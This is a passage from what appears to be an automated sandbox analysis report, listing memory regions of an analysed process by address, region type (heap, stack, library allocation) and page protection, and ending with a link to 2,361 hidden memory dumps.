trusted library allocation
page read and write
33CD000
heap
page read and write
D11000
heap
page read and write
2F81000
heap
page read and write
CEB000
heap
page read and write
34FA000
heap
page read and write
344000
unkown
page readonly
7E1A000
heap
page read and write
9A2000
heap
page read and write
895000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
4EC000
stack
page read and write
2F71000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
895000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
A10000
unclassified section
page readonly
2F71000
heap
page read and write
2F81000
heap
page read and write
7DD8000
heap
page read and write
2F81000
heap
page read and write
AE0000
heap
page read and write
3070000
trusted library allocation
page read and write
94C000
stack
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
DD0000
heap
page read and write
894000
heap
page read and write
9AD000
heap
page read and write
3260000
trusted library allocation
page read and write
2CD000
unkown
page readonly
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
7DD8000
heap
page read and write
B94000
heap
page read and write
7DFA000
heap
page read and write
2F81000
heap
page read and write
CF3000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
7DD8000
heap
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
25E000
unkown
page read and write
480000
unclassified section
page readonly
B94000
heap
page read and write
880000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
313F000
stack
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
A470000
heap
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
DDE000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
AE3000
heap
page read and write
2F81000
heap
page read and write
34AC000
stack
page read and write
3070000
trusted library allocation
page read and write
2DE0000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
6EC000
stack
page read and write
894000
heap
page read and write
2E40000
unclassified section
page readonly
2F71000
heap
page read and write
2F81000
heap
page read and write
3220000
heap
page read and write
D9E000
stack
page read and write
3070000
trusted library allocation
page read and write
2CE0000
heap
page read and write
96E000
heap
page read and write
DC0000
heap
page read and write
2F71000
heap
page read and write
890000
heap
page read and write
3260000
trusted library allocation
page read and write
895000
heap
page read and write
894000
heap
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2DE0000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
A3F6000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2F71000
heap
page read and write
16D0000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
894000
heap
page read and write
3260000
trusted library allocation
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
D4B000
heap
page read and write
D3E000
heap
page read and write
4FA9000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
895000
heap
page read and write
340C000
stack
page read and write
2F80000
heap
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
33CD000
heap
page read and write
DE0000
unclassified section
page readonly
2F81000
heap
page read and write
9E5000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
DD4000
heap
page read and write
3070000
trusted library allocation
page read and write
7D76000
heap
page read and write
D48000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
3B9000
stack
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
C3E000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
4C0000
unclassified section
page readonly
11D9000
unkown
page readonly
D80000
heap
page read and write
B94000
heap
page read and write
11D8000
unkown
page readonly
1184000
heap
page read and write
985E000
stack
page read and write
894000
heap
page read and write
7DF8000
heap
page read and write
33C8000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
316A000
stack
page read and write
3260000
trusted library allocation
page read and write
894000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
66F000
unkown
page write copy
2F81000
heap
page read and write
B94000
heap
page read and write
3F0000
unclassified section
page readonly
F1D000
stack
page read and write
894000
heap
page read and write
7D7A000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
894000
heap
page read and write
144F000
stack
page read and write
A0C000
heap
page read and write
894000
heap
page read and write
B94000
heap
page read and write
1AC000
stack
page read and write
AE50000
direct allocation
page read and write
203000
unkown
page readonly
2F71000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
DD4000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
DC0000
heap
page read and write
2F81000
heap
page read and write
952000
heap
page read and write
9C0000
heap
page read and write
2F81000
heap
page read and write
7E08000
heap
page read and write
AFE000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
7E18000
heap
page read and write
A190000
remote allocation
page read and write
6A6E000
stack
page read and write
B94000
heap
page read and write
294E000
stack
page read and write
968000
heap
page read and write
A3F0000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
32CF000
stack
page read and write
A80000
unclassified section
page readonly
CD5000
heap
page read and write
894000
heap
page read and write
A41B000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
37E0000
trusted library allocation
page read and write
37E0000
trusted library allocation
page read and write
894000
heap
page read and write
2F71000
heap
page read and write
2830000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
7D6B000
heap
page read and write
2F81000
heap
page read and write
D52000
heap
page read and write
114A000
heap
page read and write
7E1B000
heap
page read and write
37E0000
trusted library allocation
page read and write
9D000
stack
page read and write
2F71000
heap
page read and write
7E18000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
D52000
heap
page read and write
7D64000
heap
page read and write
2F81000
heap
page read and write
B0C000
heap
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
9B0000
heap
page read and write
2F71000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
BDE000
stack
page read and write
2F71000
heap
page read and write
33C9000
heap
page read and write
17AE000
stack
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
A09000
heap
page read and write
2F81000
heap
page read and write
698000
heap
page read and write
97D000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
7E1C000
heap
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
4D00000
heap
page read and write
320E000
stack
page read and write
DE7000
heap
page read and write
2F81000
heap
page read and write
DD0000
heap
page read and write
CEE000
heap
page read and write
33D6000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
590000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
4A40000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
800000
heap
page read and write
2F81000
heap
page read and write
2D7E000
stack
page read and write
96E000
heap
page read and write
C10000
trusted library allocation
page read and write
2F71000
heap
page read and write
7DC6000
heap
page read and write
3070000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
120B000
unkown
page readonly
2F81000
heap
page read and write
DC3000
heap
page read and write
7DCB000
heap
page read and write
1C0000
unclassified section
page readonly
2F71000
heap
page read and write
34F9000
heap
page read and write
2F81000
heap
page read and write
ADD000
heap
page read and write
2F81000
heap
page read and write
895000
heap
page read and write
96DF000
stack
page read and write
EA0000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
611000
unkown
page execute read
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
11CE000
stack
page read and write
2F71000
heap
page read and write
180000
unclassified section
page readonly
2F71000
heap
page read and write
95F000
stack
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
9A6000
heap
page read and write
2F71000
heap
page read and write
2E1E000
stack
page read and write
9A8000
heap
page read and write
AE9000
heap
page read and write
460000
unclassified section
page readonly
9B8000
heap
page read and write
4D01000
heap
page read and write
760000
unclassified section
page readonly
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
4F1F000
stack
page read and write
981E000
stack
page read and write
2F81000
heap
page read and write
5EE000
stack
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
7E28000
heap
page read and write
2F81000
heap
page read and write
9A8000
heap
page read and write
4AFE000
stack
page read and write
AF9000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
4FE000
stack
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
894000
heap
page read and write
590000
unclassified section
page readonly
2F81000
heap
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
95A000
heap
page read and write
87F000
stack
page read and write
2F4E000
stack
page read and write
B95000
heap
page read and write
3260000
trusted library allocation
page read and write
DE6000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
8B0000
heap
page read and write
894000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
33C0000
heap
page read and write
33D6000
heap
page read and write
37E0000
trusted library allocation
page read and write
33D1000
heap
page read and write
37E0000
trusted library allocation
page read and write
322E000
stack
page read and write
894000
heap
page read and write
B95000
heap
page read and write
2F71000
heap
page read and write
7D8C000
heap
page read and write
B95000
heap
page read and write
894000
heap
page read and write
B94000
heap
page read and write
4D02000
heap
page read and write
B94000
heap
page read and write
1117000
unkown
page readonly
2F71000
heap
page read and write
E80000
unkown
page readonly
49C000
stack
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
CED000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
190000
unclassified section
page readonly
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
A46F000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
7D60000
heap
page read and write
2F81000
heap
page read and write
7DC4000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2C50000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
87D000
stack
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
560000
unclassified section
page readonly
2F81000
heap
page read and write
8A0000
heap
page read and write
952000
heap
page read and write
B94000
heap
page read and write
4D09000
heap
page read and write
2F71000
heap
page read and write
18E000
stack
page read and write
2F81000
heap
page read and write
598000
heap
page read and write
7E21000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
4410000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
AFD000
stack
page read and write
B95000
heap
page read and write
2F81000
heap
page read and write
D4B000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
894000
heap
page read and write
A20000
unclassified section
page readonly
B94000
heap
page read and write
9EF000
heap
page read and write
2DEE000
stack
page read and write
6A00000
heap
page read and write
673000
unkown
page readonly
2F81000
heap
page read and write
2F71000
heap
page read and write
3228000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
EBD000
heap
page read and write
3070000
trusted library allocation
page read and write
172B000
stack
page read and write
6A0B000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2BFE000
stack
page read and write
9B0000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
7E1C000
heap
page read and write
7D66000
heap
page read and write
B94000
heap
page read and write
4E5E000
stack
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
DDF000
heap
page read and write
90C000
stack
page read and write
880000
unclassified section
page readonly
7DCB000
heap
page read and write
7D64000
heap
page read and write
980000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
30E0000
heap
page read and write
895000
heap
page read and write
A3EF000
stack
page read and write
4C0000
unclassified section
page readonly
3260000
trusted library allocation
page read and write
7C0000
unclassified section
page readonly
11F0000
unkown
page readonly
2F81000
heap
page read and write
B94000
heap
page read and write
37E0000
trusted library allocation
page read and write
DC0000
trusted library allocation
page read and write
2F71000
heap
page read and write
32CF000
stack
page read and write
1EC000
unkown
page readonly
894000
heap
page read and write
A3FA000
heap
page read and write
2F71000
heap
page read and write
DD4000
heap
page read and write
2F71000
heap
page read and write
890000
unclassified section
page readonly
2F81000
heap
page read and write
7D73000
heap
page read and write
9AF000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
1F5000
unkown
page readonly
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
140000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
894000
heap
page read and write
B95000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
7E1F000
heap
page read and write
3070000
trusted library allocation
page read and write
98E000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
6A70000
heap
page read and write
2F81000
heap
page read and write
DD4000
heap
page read and write
3070000
trusted library allocation
page read and write
7DB000
stack
page read and write
2F81000
heap
page read and write
E1B000
heap
page read and write
3070000
trusted library allocation
page read and write
935E000
stack
page read and write
B94000
heap
page read and write
894000
heap
page read and write
B94000
heap
page read and write
4FA1000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
DF9000
heap
page read and write
D2F000
heap
page read and write
32E8000
heap
page read and write
895000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
C49000
heap
page read and write
2F71000
heap
page read and write
11CE000
unkown
page read and write
894000
heap
page read and write
2C3F000
stack
page read and write
297D000
heap
page read and write
2F81000
heap
page read and write
303F000
stack
page read and write
3070000
trusted library allocation
page read and write
A46F000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
A4B0000
heap
page read and write
9C8000
heap
page read and write
2F81000
heap
page read and write
9EF000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
D52000
heap
page read and write
2950000
heap
page read and write
A1000
unkown
page execute read
2C58000
heap
page read and write
2F71000
heap
page read and write
A38000
stack
page read and write
894000
heap
page read and write
33C6000
heap
page read and write
2F81000
heap
page read and write
9C4000
heap
page read and write
2F71000
heap
page read and write
DE0000
heap
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
CCB000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
895000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
7E36000
heap
page read and write
588000
stack
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
650000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
369E000
stack
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
3260000
trusted library allocation
page read and write
DE6000
heap
page read and write
B11000
heap
page read and write
710000
unclassified section
page readonly
3260000
trusted library allocation
page read and write
2F30000
unclassified section
page readonly
3070000
trusted library allocation
page read and write
B0C5000
direct allocation
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
3260000
trusted library allocation
page read and write
1200000
unkown
page readonly
2F81000
heap
page read and write
308F000
stack
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
66F000
unkown
page read and write
610000
unkown
page readonly
2F81000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
7E1B000
heap
page read and write
2F81000
heap
page read and write
610000
unkown
page readonly
4FA9000
heap
page read and write
894000
heap
page read and write
DDF000
heap
page read and write
4FA9000
heap
page read and write
2F81000
heap
page read and write
118D000
heap
page read and write
6A05000
heap
page read and write
57C000
stack
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
9A3000
heap
page read and write
E30000
heap
page read and write
77C000
stack
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
4F0000
unclassified section
page readonly
2F81000
heap
page read and write
2DE8000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
37E0000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
37E0000
trusted library allocation
page read and write
2C5D000
heap
page read and write
7F0000
heap
page read and write
2F71000
heap
page read and write
47D000
stack
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2FED000
stack
page read and write
2F81000
heap
page read and write
B101000
direct allocation
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
673000
unkown
page readonly
B94000
heap
page read and write
AD0000
heap
page read and write
3260000
trusted library allocation
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
7E0B000
heap
page read and write
4B60000
heap
page read and write
B94000
heap
page read and write
A471000
heap
page read and write
2F90000
heap
page read and write
88D000
stack
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
B94000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
74E000
stack
page read and write
69FE000
stack
page read and write
AD8000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
CB0000
heap
page read and write
7D61000
heap
page read and write
894000
heap
page read and write
98C000
heap
page read and write
3070000
trusted library allocation
page read and write
D10000
unclassified section
page readonly
B94000
heap
page read and write
894000
heap
page read and write
4EDE000
stack
page read and write
DD9000
heap
page read and write
3260000
trusted library allocation
page read and write
11CD000
unkown
page write copy
F60000
heap
page read and write
C08000
heap
page read and write
A0000
unkown
page readonly
A00000
unclassified section
page readonly
2F71000
heap
page read and write
1CF000
stack
page read and write
37E0000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
B95000
heap
page read and write
611000
unkown
page execute read
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
B94000
heap
page read and write
2E4D000
stack
page read and write
B94000
heap
page read and write
33C7000
heap
page read and write
7E18000
heap
page read and write
2F81000
heap
page read and write
A00000
heap
page read and write
33CF000
heap
page read and write
6B80000
heap
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
7D76000
heap
page read and write
EDF000
stack
page read and write
7E0C000
heap
page read and write
58C000
stack
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
1120000
heap
page read and write
2F71000
heap
page read and write
CEC000
heap
page read and write
31B0000
heap
page read and write
894000
heap
page read and write
7DF9000
heap
page read and write
B94000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
611000
unkown
page execute read
2F71000
heap
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
470000
unclassified section
page readonly
3070000
trusted library allocation
page read and write
48AE000
stack
page read and write
B95000
heap
page read and write
3260000
trusted library allocation
page read and write
34F7000
heap
page read and write
4BEF000
stack
page read and write
E4E000
stack
page read and write
C20000
heap
page read and write
1D0000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
CD2000
heap
page read and write
3070000
trusted library allocation
page read and write
89F000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
673000
unkown
page readonly
B94000
heap
page read and write
3260000
trusted library allocation
page read and write
D02000
heap
page read and write
2F81000
heap
page read and write
7E24000
heap
page read and write
2F81000
heap
page read and write
98C000
heap
page read and write
B95000
heap
page read and write
7DCB000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
11E3000
unkown
page readonly
7DC4000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
B95000
heap
page read and write
7D9E000
heap
page read and write
2F81000
heap
page read and write
949E000
stack
page read and write
3070000
trusted library allocation
page read and write
2F71000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
977000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
4FA0000
heap
page read and write
E70000
heap
page read and write
894000
heap
page read and write
7DFD000
heap
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
4B0000
heap
page read and write
2F81000
heap
page read and write
580000
unclassified section
page readonly
895000
heap
page read and write
2F81000
heap
page read and write
895000
heap
page read and write
95D000
heap
page read and write
7DD8000
heap
page read and write
92C000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
DD4000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
B94000
heap
page read and write
A8C000
stack
page read and write
2F71000
heap
page read and write
E0E000
stack
page read and write
2F71000
heap
page read and write
37E0000
trusted library allocation
page read and write
7E3B000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
9CF000
stack
page read and write
2F71000
heap
page read and write
D0C000
heap
page read and write
D2D000
heap
page read and write
3260000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
1EC000
unkown
page readonly
2F81000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2F71000
heap
page read and write
1140000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
2F71000
heap
page read and write
37E0000
trusted library allocation
page read and write
E81000
unkown
page execute read
2F71000
heap
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
D49000
heap
page read and write
There are 2361 hidden memdumps, click here to show them.